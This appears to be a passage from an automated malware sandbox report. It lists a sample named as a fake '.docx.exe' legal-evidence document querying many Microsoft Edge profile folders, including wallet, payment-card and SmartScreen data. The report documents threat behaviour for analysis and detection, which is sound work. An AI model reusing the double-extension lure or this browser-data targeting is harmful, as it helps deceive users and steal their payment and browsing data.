Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\7.0.0.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips\2983 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.50 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.50 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments VolumeInformation	Jump to behavior
